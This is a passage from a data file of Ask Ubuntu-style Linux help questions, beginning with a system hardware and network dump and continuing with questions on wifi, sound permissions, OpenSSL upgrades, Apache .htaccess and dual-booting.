/usr/share/gconf/lubuntu.mandatory.path im_config_phase 1 sessiontype lxsession upstart_job lxsession logname augustin defaults_path /usr/share/gconf/lubuntu.default.path xdg_session_id c2 path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games gdm_lang fr_fr xdg_session_path /org/freedesktop/displaymanager/session0 xdg_runtime_dir /run/user/1000 display :0 lang fr_fr.utf-8 xauthority /home/augustin/.xauthority ssh_auth_sock /tmp/ssh-tqb03q64jld2/agent.1452 shell /bin/zsh node_path /usr/lib/nodejs : /usr/lib/node_modules : /usr/share/javascript gdmsession lubuntu upstart_events started xsession textdomaindir /usr/share/locale/ upstart_session unix : abstract=/com/ubuntu/upstart-session/1000/1358 xdg_vtnr 7 pwd /home/augustin xdg_config_dirs /etc/xdg/lubuntu : /etc/xdg : /etc/xdg/xdg-lubuntu : /usr/share/upstart/xdg : /etc/xdg xdg_data_dirs /etc/xdg/lubuntu : /usr/local/share : /usr/share : /usr/share/gdm : /var/lib/menu-xdg : /etc/xdg/xdg-lubuntu : /usr/share/upstart/xdg : /etc/xdg job dbus xdg_current_desktop lxde _lxsession_pid 1477 xdg_menu_prefix lxde- sal_use_vclplugin gtk xdg_config_home /home/augustin/.config users users root root daemon daemon bin bin sys sys sync sync games games man man lp lp mail mail news news uucp uucp proxy proxy www-data www-data backup backup list mailing list manager irc ircd gnats gnats bug-reporting system ( admin ) nobody nobody libuuid syslog messagebus usbmux usbmux daemon dnsmasq dnsmasq ntp whoopsie lightdm light display manager augustin augustin pulse pulseaudio daemon rtkit realtimekit postgres postgresql administrator avahi avahi mdns daemon mapbox mapbox system user couchdb couchdb administrator memcache memcached saned devices processor processors intel ( r ) core ( tm ) i5-2557m cpu @ 1.70ghz 1701,00mhz intel ( r ) core ( tm ) i5-2557m cpu @ 1.70ghz 1701,00mhz intel ( r ) core ( tm ) i5-2557m cpu @ 1.70ghz 1600,00mhz intel ( r ) core ( tm ) i5-2557m cpu @ 1.70ghz 1701,00mhz memory memory total memory 3947240 kb free memory 129840 kb buffers 9908 kb cached 602272 kb cached swap 925048 kb active 2083128 kb inactive 959920 kb active ( anon ) 2010676 kb inactive ( anon ) 895780 kb active ( file ) 72452 kb inactive ( file ) 64140 kb unevictable 0 kb mlocked 0 kb virtual memory 9785708 kb free virtual memory 7224180 kb dirty 80 kb writeback 0 kb anonpages 2166272 kb mapped 141020 kb shmem 475588 kb slab 82140 kb sreclaimable 39600 kb sunreclaim 42540 kb kernelstack 5280 kb pagetables 69612 kb nfs_unstable 0 kb bounce 0 kb writebacktmp 0 kb commitlimit 11759328 kb committed_as 10360736 kb vmalloctotal 34359738367 kb vmallocused 359556 kb vmallocchunk 34359368572 kb hardwarecorrupted 0 kb anonhugepages 0 kb hugepages_total 0 hugepages_free 0 hugepages_rsvd 0 hugepages_surp 0 hugepagesize 2048 kb directmap4k 66592 kb directmap2m 4028416 kb pci devices pci devices host bridge intel corporation 2nd generation core processor family dram controller ( rev 09 ) vga compatible controller intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) communication controller intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) audio device intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) ( prog-if 00 [ normal decode ] ) usb controller intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) isa bridge intel corporation qs67 express chipset family lpc controller ( rev 05 ) sata controller intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) smbus intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) network controller qualcomm atheros ar9485 wireless network adapter ( rev 01 ) usb controller fresco logic fl1009 usb 3.0 host controller ( rev 02 ) ( prog-if 30 [ xhci ] ) usb devices printers printers ( cups ) hp-officejet-7400-series default photosmart_b010 photosmart_b010_2 battery no batteries no batteries found on this system sensors input devices input devices lid switch power button sleep button at translated set 2 keyboard usb2.0 vga webcam asus wmi hotkeys etps/2 elantech touchpad video bus hda intel pch hdmi/dp , pcm 3= hda intel pch headphone hda intel pch mic storage scsi disks ata sandisk ssd u100 generic- xd/sd/m.s . dmi bios date 01/20/2012 vendor american megatrends inc. ( www.ami.com ) version ux31e.211 board name ux31e vendor asustek computer inc. ( seagate , www.seagate.com ) resources i/o ports 0000-0cf7 pci bus 0000:00 0000-001f dma1 0020-0021 pic1 0040-0043 timer0 0050-0053 timer1 0060-0060 keyboard 0062-0062 ec data 0064-0064 keyboard 0066-0066 ec cmd 0070-0077 rtc0 0080-008f dma page reg 00a0-00a1 pic2 00c0-00df dma2 00f0-00ff fpu 0240-0259 pnp 00:07 0400-0403 acpi pm1a_evt_blk 0404-0405 acpi pm1a_cnt_blk 0408-040b acpi pm_tmr 0410-0415 acpi cpu throttle 0420-042f acpi gpe0_blk 0430-0433 itco_wdt 0450-0450 acpi pm2_cnt_blk 0454-0457 pnp 00:06 0458-047f pnp 00:04 0460-047f itco_wdt 0500-057f pnp 00:04 0680-069f pnp 00:04 0cf8-0cff pci conf1 0d00-ffff pci bus 0000:00 1000-100f pnp 00:04 164e-164f pnp 00:04 b000-bfff pci bus 0000:03 c000-cfff pci bus 0000:02 d000-dfff pci bus 0000:01 e000-e03f intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) e040-e05f intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) e060-e07f intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) e060-e07f ahci sata low-level driver e080-e083 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) e080-e083 ahci sata low-level driver e090-e097 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) e090-e097 ahci sata low-level driver e0a0-e0a3 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) e0a0-e0a3 ahci sata low-level driver e0b0-e0b7 intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) e0b0-e0b7 ahci sata low-level driver ffff-ffff pnp 00:04 ffff-ffff pnp 00:04 memory 00000000-00000fff reserved 00001000-0009e7ff system ram 0009e800-0009ffff reserved 000a0000-000bffff pci bus 0000:00 000c0000-000ce7ff video rom 000d0000-000d3fff pci bus 0000:00 000d4000-000d7fff pci bus 0000:00 000d8000-000dbfff pci bus 0000:00 000dc000-000dffff pci bus 0000:00 000e0000-000fffff reserved 000e0000-000e3fff pci bus 0000:00 000e4000-000e7fff pci bus 0000:00 000f0000-000fffff system rom 00100000-1fffffff system ram 01000000-016fcdc6 kernel code 016fcdc7-01d0eeff kernel data 01e6e000-01fd0fff kernel bss 20000000-201fffff reserved 20000000-201fffff pnp 00:0c 20200000-3fffffff system ram 40000000-401fffff reserved 40000000-401fffff pnp 00:0c 40200000-ba883fff system ram ba884000-ba9e9fff reserved ba9ea000-bac0bfff system ram bac0c000-bad95fff reserved bad96000-bad96fff system ram bad97000-bade7fff reserved bade8000-bae33fff system ram bae34000-bafe7fff acpi non-volatile storage bafe8000-baffcfff system ram baffd000-baffffff acpi tables bb000000-bfffffff reserved c0000000-feafffff pci bus 0000:00 c0000000-cfffffff intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) d0000000-d09fffff pci bus 0000:03 d0b00000-d14fffff pci bus 0000:02 d1600000-d1ffffff pci bus 0000:01 d2000000-d2000fff pnp 00:0b ddc00000-ddffffff intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) de000000-de9fffff pci bus 0000:03 de000000-de00ffff fresco logic fl1009 usb 3.0 host controller ( rev 02 ) ( prog-if 30 [ xhci ] ) de000000-de00ffff xhci_hcd de010000-de010fff fresco logic fl1009 usb 3.0 host controller ( rev 02 ) ( prog-if 30 [ xhci ] ) de011000-de011fff fresco logic fl1009 usb 3.0 host controller ( rev 02 ) ( prog-if 30 [ xhci ] ) dea00000-df3fffff pci bus 0000:02 dea00000-dea7ffff qualcomm atheros ar9485 wireless network adapter ( rev 01 ) dea00000-dea7ffff support for atheros 802.11n wireless lan cards . dea80000-dea8ffff qualcomm atheros ar9485 wireless network adapter ( rev 01 ) df400000-dfdfffff pci bus 0000:01 dfe00000-dfe03fff intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) dfe00000-dfe03fff ich hd audio dfe05000-dfe050ff intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) dfe06000-dfe067ff intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) dfe06000-dfe067ff ahci sata low-level driver dfe07000-dfe073ff intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) dfe07000-dfe073ff ehci_hcd dfe09000-dfe0900f intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) dfe09000-dfe0900f intel ( r ) management engine interface e0000000-e3ffffff pci mmconfig 0000 [ bus 00-3f ] e0000000-e3ffffff reserved e0000000-e3ffffff pnp 00:0a fec00000-fec00fff reserved fec00000-fec003ff ioapic 0 fed00000-fed003ff hpet 0 fed10000-fed13fff reserved fed18000-fed19fff reserved fed18000-fed18fff pnp 00:0a fed19000-fed19fff pnp 00:0a fed1c000-fed1ffff reserved fed1c000-fed1ffff pnp 00:0a fed1f410-fed1f414 itco_wdt fed20000-fed3ffff pnp 00:0a fed40000-fed44fff pci bus 0000:00 fed45000-fed8ffff pnp 00:0a fed90000-fed90fff dmar0 fed91000-fed91fff dmar1 fee00000-fee00fff local apic fee00000-fee00fff reserved ff980000-ffbfffff reserved ffd80000-ffffffff reserved 100000000-13f7fffff system ram 13f800000-13fffffff ram buffer dma 4 cascade network interfaces network interfaces lo 75,26mib 75,26mib 127.0.0.1 wlan0 2523,84mib 313,60mib 192.168.10.11 ip connections connections 127.0.0.1:11211 0.0.0.0 : * udp 0.0.0.0:80 listen 0.0.0.0 : * tcp 127.0.1.1:53 0.0.0.0 : * udp 0.0.0.0:3030 listen 0.0.0.0 : * tcp 127.0.0.1:631 listen 0.0.0.0 : * tcp 0.0.0.0:3000 listen 0.0.0.0 : * tcp 127.0.0.1:5432 established 127.0.0.1:49925 tcp 0.0.0.0:17500 0.0.0.0 : * udp 127.0.0.1:5984 listen 0.0.0.0 : * tcp 0.0.0.0:59396 0.0.0.0 : * udp 127.0.0.1:49923 established 127.0.0.1:5432 tcp 192.168.10.11:58455 established 213.199.179.142:40019 tcp 127.0.0.1:5432 established 127.0.0.1:49925 tcp 192.168.10.11:50182 established 54.216.68.238:80 tcp 192.168.10.11:53368 established 75.126.166.165:443 tcp 127.0.0.1:58744 established 127.0.0.1:5432 tcp 192.168.10.11:49359 established 54.82.95.91:443 tcp 127.0.0.1:5432 established 127.0.0.1:49925 tcp 192.168.10.11:43315 established 198.252.206.25:443 tcp 192.168.10.11:57247 established 173.194.40.117:443 tcp 127.0.0.1:49924 established 127.0.0.1:5432 tcp 127.0.0.1:49925 established 127.0.0.1:5432 tcp 192.168.10.11:57446 established 157.56.116.210:12350 tcp 192.168.10.11:49708 close_wait 54.216.68.238:80 tcp 192.168.10.11:53765 established 74.125.132.125:5222 tcp 192.168.10.11:39499 established 54.246.129.89:443 tcp 192.168.10.11:41080 established 198.252.206.25:443 tcp 192.168.10.11:58682 established 173.194.34.50:443 tcp 192.168.10.11:53568 established 93.184.221.96:443 tcp 192.168.10.11:43023 established 157.56.126.41:443 tcp 192.168.10.11:38379 established 198.252.206.24:80 tcp 192.168.10.11:59728 established 108.160.162.38:80 tcp 127.0.0.1:5432 established 127.0.0.1:49925 tcp 192.168.10.11:60463 established 178.79.152.100:80 tcp 192.168.10.11:60650 established 173.194.66.189:443 tcp 127.0.0.1:5432 established 127.0.0.1:49925 tcp 192.168.10.11:35203 established 54.228.93.133:80 tcp 192.168.10.11:37797 established 192.168.10.127:17500 tcp 192.168.10.11:49219 established 54.216.68.238:80 tcp 192.168.10.11:50752 established 107.20.135.171:443 tcp : ::80 listen : : : * tcp6 : :1:631 listen : : : * tcp6 127.0.0.1:41823 0.0.0.0 : * udp 127.0.0.1:11211 0.0.0.0 : * udp 0.0.0.0:17500 0.0.0.0 : * udp 0.0.0.0:5353 0.0.0.0 : * udp 127.0.0.1:50440 established 127.0.0.1:50440 udp 0.0.0.0:53203 0.0.0.0 : * udp 0.0.0.0:59396 0.0.0.0 : * udp 127.0.1.1:53 0.0.0.0 : * udp 0.0.0.0:68 0.0.0.0 : * udp 192.168.10.11:123 0.0.0.0 : * udp 127.0.0.1:123 0.0.0.0 : * udp 0.0.0.0:123 0.0.0.0 : * udp 0.0.0.0:43419 0.0.0.0 : * udp : ::50401 : : : * udp6 : ::5353 : : : * udp6 fe80 : :208 : caff : fe87:123 : : : * udp6 : :1:123 : : : * udp6 : ::123 : : : * udp6 : ::57680 : : : * udp6 routing table ip routing table 0.0.0.0 / 192.168.10.254 0.0.0.0 ug wlan0 192.168.10.0 / 0.0.0.0 255.255.255.0 u wlan0 arp table arp table 192.168.10.164 78 : e4:00:1a:82:49 wlan0 192.168.10.158 24:0a:64 : f8:9a : a6 wlan0 192.168.10.127 58 : b0:35:63:39:28 wlan0 192.168.10.254 00:90:0b:23:76:36 wlan0 192.168.10.197 b8 : e8:56:31:2a:06 wlan0 192.168.10.45 e0 : f8:47:19 : dc : de wlan0 192.168.10.250 00:11:32:20 : e5 : e1 wlan0 dns servers name servers 127.0.1.1 statistics ip 2157697 paquets reçus au total 0 paquets arrivant rejetés 3 avec un protocole inconnu 0 paquets arrivant rejetés 2147649 paquets entrants délivrés 1223555 requêtes envoyées 244 paquets sortants rejetés 234 dropped because of missing route icmp 3539 messages icmp reçus 95 messages icmp entrant échoués 810 messages icmp envoyés 0 messages icmp échoués icmpmsg tcp 15407 ouvertures de connexions actives 5356 connexions passives ouvertes 409 tentatives de connexion échouées 856 reinitialisation de la connection détéctée 28 connexions établies 1816595 segments reçus 1006545 segments envoyés 10728 segments retransmis 79 mauvais segments reçus 2861 réinitailisations envoyées udp 358456 packets reçus 719 paquets reçus sur un port inconnu 2914 erreurs de réception de paquet 278795 paquets envoyés udplite tcpext 325 cookies syn invalides reçus 24 resets received for embryonic syn_recv sockets 14 packets pruned from receive queue because of socket buffer overrun 19 paquets icmp rejetés par ce qu'ils étaient en dehors de la fenêtre d'acquittement 6994 tcp sockets finished time wait in fast timer 12 dsacks sent for out of order packets 25961 accusés de réception envoyés en retard 16 delayed acks further delayed because of locked socket 16290 paquets directement mis en attente dans la file d'attente recvmsg . 1 congestion windows fully recovered without slow start 70095 bytes directly received in process context from prequeue 1342959 en-têtes de paquets prédits 6 packets header predicted and directly queued to user 62560 acknowledgments not containing data payload received 51749 accusés de réception prédits 1079 times recovered from packet loss by selective acknowledgements 1 congestion windows fully recovered without slow start 5 congestion windows recovered without slow start by dsack 248 congestion windows recovered without slow start after partial ack 88 timeouts after sack recovery 18 timeouts in loss state 1422 fast retransmits 74 sack retransmits failed 73 retransmits in slow start 1898 other tcp timeouts 74 sack retransmits failed 44 packets collapsed in receive queue due to low socket buffer 1860 dsacks sent for old packets 12 dsacks sent for out of order packets 470 connections reset due to unexpected data 470 connections reset due to unexpected data 765 connections reset due to early user close 314 connections aborted due to timeout ipext shared directories samba nfs benchmarks cpu blowfish cpu blowfish this machine 1701 mhz 4,882 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 26.1876862 powerpc 740/750 ( 280.00mhz ) ( null ) 172.816713 cpu cryptohash cpu cryptohash this machine 1701 mhz 268,035 cpu fibonacci cpu fibonacci this machine 1701 mhz 2,111 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 8.1375674 powerpc 740/750 ( 280.00mhz ) ( null ) 58.07682 cpu n-queens cpu n-queens this machine 1701 mhz 4,818 fpu fft fpu fft this machine 1701 mhz 1,255 fpu raytracing fpu raytracing this machine 1701 mhz 6,594 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 40.8816714 powerpc 740/750 ( 280.00mhz ) ( null ) 161.312647 thanks a lot for support , i would be really sad to have to change my laptop after less than a year edit : here 's a screenshot of my task manager too . no process goes higher than 6 % , but processor can easily reach 100 % : and here are two screenshots taken consecutively : 1 . `` cache memory considered free '' unchecked 2 . `` cache memory considered free '' checked 1 . 2 .
445557	control sound permissions , revoke access to audio	i would like to control permissions to use sound card . there are devices `` /dev/snd/* '' , the owner is `` root '' , group is `` audio '' , permissions `` 660 '' . so , i would expect only users in `` audio '' group could use sound card , however it does n't work . i have a user `` u1 '' which is not in group `` audio '' , however he has access ! i 've found out that the access is controlled with acl , so getfacl shows the following : # file : timer # owner : root # group : audio # flags : -- t user : :rw- user : u1 : rw- group : :rw- mask : :rw- other : : -- - the line `` user : u1 : rw- '' magically appears again even if i remove it with setfacl . for me it looks like that there is a root-owned process which automatically adds permissions to any user ignoring `` audio '' group membership . why is the access granted ? how to revoke access to sound card for a user ?
445562	per user dconf locks	after reading much useful information in this site i 've come to understand how the dconf system works , giving priority to user settings first , then system-db if there are any . i understand that these system-db settings can be locked using the locks folder inside the db.d/locks folder . my question is this : can i specify different dbs for different users in the same computer ? i intend to lock the user backgrounds ( using the /org/gnome/desktop/background/picture-uri lock ) , but i still want each user to have a different background , albeit locked . in example , each user would have a background with his picture , and he/she would n't be able to change it . i have n't been able to figure this one out . thanks in advance .
445564	wifi connection not working	i ran these commands : sudo rmmod iwlwif sudo modprobe iwlwifi 11n_disable=1 sudo su echo `` options iwlwifi 11n_disable=1 '' > > /etc/modprobe.d/iwlwifi.conf now , my wifi connection is lost and there is no wifi option in the network manager . how can i restore it ?
445570	when to upgrade/install ubuntu 14.04 lts	i am using ubuntu 13.10 , and looking forward for the launch of ubuntu 14.04 lts . please suggest me how should i upgrade to 14.04 lts ?
445574	a small problem at laptop-mode-tool	vas @ lenovoz580 : ~ $ sudo laptop_mode [ sudo ] password for vas : laptop mode enabled , not active [ unchanged ] what does it mean ? i had tlp and have removed it and the problem was n't solved . what i can try ?
445576	display settings in compiz cube	i tried to change the settings using unity in compiz cube . i went to opacity settings in unity tool and then clicked on new and then on '+ ' sign and then clicked on grab , then i clicked on the same window and by mistake set its opacity to 0 now i am unable to see the window and change the settings please tell me any solution for this problem .
445577	make right+left click emulate middle click on wireless mouse	anybody have or know of a sweet little workaround script i can set to running at startup that would allow my dilapidated mouse to keep providing me with middleclick functionality even though the normal button 's busted ? in other words , on the mouse , if i press the left and right buttons simultaneously or within a few ms of each other , it 'd pipe a middle click through .
445578	touch screen desconfiguration	i have an aspire v5-572pg . i installed ubuntu for obvious reasons and it detected without problem my multi-touch hd led lcd . the problem comes when , after a while without activity , my laptop falls `` asleep '' , or even if i just cover my laptop ( wihtout closing it , just the screen ) . after that , ubuntu does n't recognize anymore that my screen is tactil , so i can not use the tactil features anymore ( unless i switch it off and on again , which is pretty annoying ) . there is any solution ? thanks a lot !
445579	system is running in low-graphics mode after instaling bumblebee in my lenovo z570 nvidia gpu	i am a newable ubuntu user about a month ago . my maschine 's specs are : linux lenovo-ideapad-z570 3.11.0-19-generic # 33~precise1-ubuntu smp wed mar 12 21:16:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux and i 'm using ubuntu 12.04.4 lts after a lot of experiments to my vga card to reduse the brightness of my screen i saw a link for bumblebee https : //wiki.ubuntu.com/bumblebee # installation and i realised that i can fix my laptop 's energy problem also . but after the installation my ubuntu the only thing that give me is a `` system running in low-graphic mode '' . after a lot of research i found the way to login in low res by getting in recovery menu , failsafex , reconf graphics , reboot and resume . so what i have now is that my laptop can recognize the vesa : intel速sandybridge mobile graphics and not my nvidia gpu . so i went to system settings . additional drivers and install the driver that was recomended.reboot but the same thing . the driver was active but not in use ! ! ! ! so after this i 've done sudo fgrep nvidia * | fgrep blacklist and i found that my nvidia was blacklisted ! ! ! i uninstalled bumblebee $ sudo apt-get remove bumblebee $ sudo rm bumblebee.conf and install again nvidia drivers but nothing again i 've tried to do this etc/modprobe.d/nvidia-graphics-drivers.conf but i had a command not found . so i have only this now : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev ff ) i ca n't undersand why nvidia is blacklisted and why if i reinstall drivers it doese n't work . something more is that in bios there are only two options . 1 optimus = nvidia + inel 2 uma = intel only nothing works . is there any idea ? thank you
445582	how do i upgrade openssl ?	i am running ubuntu 12.04 lts and would like to upgrade openssl to the latest version . openssl version -a reports `` 1.0.1 14 mar 2012 '' i ran apt-get update / upgrade / dist-upgrade but it says `` 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded '' i also tried apt-get install openssl libssl-dev but it says that openssl and libssl-dev are already the newest version . next step ?
445586	missing adobe helvetica bold fonts	when i run my application i have this errors //////////////////// % widget_droplist : requested font does not exist : -adobe-helvetica-bold-r-normal -- 12-120-75-75-p-70-iso8859-1 . /////////////////////// can someone point me to which file i should install to get this fonts . i rather not edit my code to look for other fonts .
445587	something is using my external drive . how do i find out what ?	whenever i attach my external luks drive to my laptop , the drive head starts rattling like crazy , as if i am copying the entire thing . every now and then it pauses . i 've seen some tools like iostat and diskstats but i do n't know what they mean , and they do n't mention any process or software that does the i/o anyway . how do i find out what app/process/daemon is making my drive rattle ? -edit- i have n't found anything using the drive , but interestingly , the same happened when i plugged it into a windows machine recently . it looks like the drive firmware is doing this , not the operating system ? what/why is this ? i 'm confused .
445589	powerbook clean install of ubuntu	ok , i inherited 3 mac 's . two of which had morphos installed on them . i removed the hard drives and wiped them completely clean via my mac mini . reinstalled and tried to install ubuntu . nothing happens . i see a glimpse of the `` finder '' icon for a few seconds and then i get a blank screen . i have done all the commands that i can find and nothing works . even the commands to eject the disc do not work . oh , these are mac g4 powerbooks that i am assuming had tiger os . i unfortunately do n't have them with me but the processor was 1.5 i believe and 1 gb of ram and 40 gb hard drive . other one had 250 hd , the rest the same . i apologize for missing information but any help would be appreciated . thanks , jamie
445590	heartbleed : dist-upgrade did n't fix it	sorry for my bad english . i 'm running ubuntu 12.04.2 lts ( gnu/linux 3.2.0-60-virtual x86_64 ) . in an attempt to fix heartbleed , i first ran apt-get update , then apt-get dist-upgrade . it went all ok , so i thought that that security issue was fixed . but openssl version -a outputs : openssl 1.0.1e 11 feb 2013 built on : sat feb 1 22:14:33 utc 2014 platform : debian-amd64 options : bn ( 64,64 ) rc4 ( 8x , int ) des ( idx , cisc,16 , int ) blowfish ( idx ) compiler : gcc -fpic -dopenssl_pic -dzlib -dopenssl_threads -d_reentrant -ddso_dlfcn -dhave_dlfcn_h -m64 -dl_endian -dtermio -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -d_fortify_source=2 -wl , -z , relro -wa , -- noexecstack -wall -dmd32_reg_t=int -dopenssl_ia32_sse2 -dopenssl_bn_asm_mont -dopenssl_bn_asm_mont5 -dopenssl_bn_asm_gf2m -dsha1_asm -dsha256_asm -dsha512_asm -dmd5_asm -daes_asm -dvpaes_asm -dbsaes_asm -dwhirlpool_asm -dghash_asm openssldir : `` /usr/lib/ssl '' i have already rebooted the server ( i had to replace sysvinit with upstart after dist-upgrade , otherwise i could n't reboot ) . after rebooting , apt-get dist-upgrade outputs the following : the following packages will be removed : upstart the following new packages will be installed : sysvinit the following packages have been kept back : libnih-dbus1 libnih1 0 upgraded , 1 newly installed , 1 to remove and 2 not upgraded . well , according to that output , there is nothing ssl-related left to upgrade . but openssl version -a keeps outputting the same old february build . so , my question is why is my system still running the old build of openssl ? thanks for your help .
445592	download folders from ubuntu 1	how can i download folders from u-1 now that is shutting down ? it seems that it will only allow downloading of single files . alternately , can i install u-1 in 14.04 so that i could sync ?
445594	enable use of .htaccess in apache2	this might not be directly related to ubuntu itself , but the directory tree is different here and i 'm kind of confused . i have a website i 'm trying to run and it loads fine , but it heavily relies on url rewrites which i 'm not getting because .htaccess directives might not be enabled in my installation . i 've followed the article at ubuntu.com to enable .htaccess files on my apache2 , but i could n't follow it because the files it tells me to change do not exist in the folder it tells me to go . this is the closest file name to default - 000-default.conf : < virtualhost *:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com serveradmin webmaster @ localhost documentroot /var/www # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet i do n't see any < directory /var/www/ > block here . how do i enable my .htaccess files ? i need them per project basis .
445598	wifi connection restoring	i ran the command sudo gedit /etc/modprobe.d/iwlwifi.conf it gives the following output in termianal ** ( gedit : 3409 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-kflmvcciya : connection refused ( gedit : 3409 ) : ibus-warning ** : the owner of /home/nitesh/ . config/ibus/bus is not root ! my wi-fi connection appears in network manager but it does not connect to the internet . this is the output of sudo iwconfig : wlan0 ieee 802 . 11bgn essid : `` rfnet '' mode : managed frequency:2.462 ghz access point : 9c : d6:43:16:21:20 bit rate=2 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=48/70 signal level=-62 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1457 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . how can i restore my connection ?
445600	windows 8 not working after dualbooting with ubuntu 12.04	i have recently bought lenovo ideapad z510 laptop with pre-installed windows 8 . now i installed ubuntu 12.04 ( 64 bit ) in a seperate partition . after restarting the system the boot menu appears but could n't load either windows 8 or windows recovery environment , while it showed the following message : error : unknown command 'drivemap ' . error : invalid efi file path . even though ubuntu is loading , there are some error messages ( in yellow coloured text ) shown in between the booting process . also the wi-fi did n't work . ( but still working perfectly on a live usb ) . please help me , i dont have enough knowledge in linux environment . thanks in advance here is the output of `` lshw -c network '' : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 07 serial : 28 : d2:44:3d : b2 : dc size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-1_0.0.1 06/29/12 ip=192.168.0.4 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport:3000 ( size=256 ) memory : b5600000-b5600fff memory : b5400000-b5403fff *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : b5500000-b5501fff output of `` lspci -nn '' 00:00.0 host bridge [ 0600 ] : intel corporation xeon e3-1200 v3/4th gen core processor dram controller [ 8086:0c04 ] ( rev 06 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller [ 8086:0c01 ] ( rev 06 ) 00:01.1 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller [ 8086:0c05 ] ( rev 06 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) 00:03.0 audio device [ 0403 ] : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller [ 8086:0c0c ] ( rev 06 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb xhci [ 8086:8c31 ] ( rev 05 ) 00:16.0 communication controller [ 0780 ] : intel corporation 8 series/c220 series chipset family mei controller # 1 [ 8086:8c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb ehci # 2 [ 8086:8c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 8 series/c220 series chipset high definition audio controller [ 8086:8c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 4 [ 8086:8c16 ] ( rev d5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 5 [ 8086:8c18 ] ( rev d5 ) 00:1d.0 usb controller [ 0c03 ] : 